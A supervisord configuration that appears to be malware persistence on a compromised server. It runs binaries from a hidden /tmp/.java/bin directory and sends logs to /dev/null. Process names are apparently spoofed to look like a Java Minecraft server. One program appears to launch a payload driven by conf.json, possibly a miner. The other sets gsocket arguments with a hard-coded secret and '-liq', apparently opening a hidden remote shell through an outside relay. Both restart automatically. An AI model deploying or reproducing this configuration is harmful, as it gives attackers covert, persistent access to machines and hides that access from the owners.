[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./paper.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i0C9A1e9A2c-0A5f1D9g8H7bJ7-5C4F9e1-C9F0d3A2-o8K2w6J3D4-k1C5J1g7 -liq"
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true